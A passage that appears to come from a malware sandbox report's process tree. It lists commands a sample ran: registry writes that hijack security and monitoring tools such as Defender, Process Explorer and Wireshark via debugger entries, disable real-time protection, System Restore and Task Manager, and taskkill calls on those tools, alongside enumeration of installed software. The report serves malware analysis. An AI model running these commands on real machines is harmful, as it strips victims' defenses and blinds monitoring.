  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1492
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1044
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1832
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1272
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1888
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1536
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1928
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1528
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1852
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1016
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:828
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1172
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:548
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:436
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1908
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1752
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1492
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1784
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1184
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1900
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:1632
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:2016
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1044
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:1472
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1816
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1460
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1476
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1524
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1948
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:436
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1652
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1416
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1880
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:2016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1924
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:568
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1524
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:608
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1948
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1872
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1524
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:524
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1688
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:1856
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:316
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1780
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1408
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:1872
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:360
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:1856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:1948
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:1864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:316
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:1408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:1424
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:1780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1476
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:1424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1180
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:1688
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1648
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1636
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:608
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1968
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:368
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1944
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1424
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2040
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1696
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:928
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2040
- - C:\Windows\system32\reg.exe
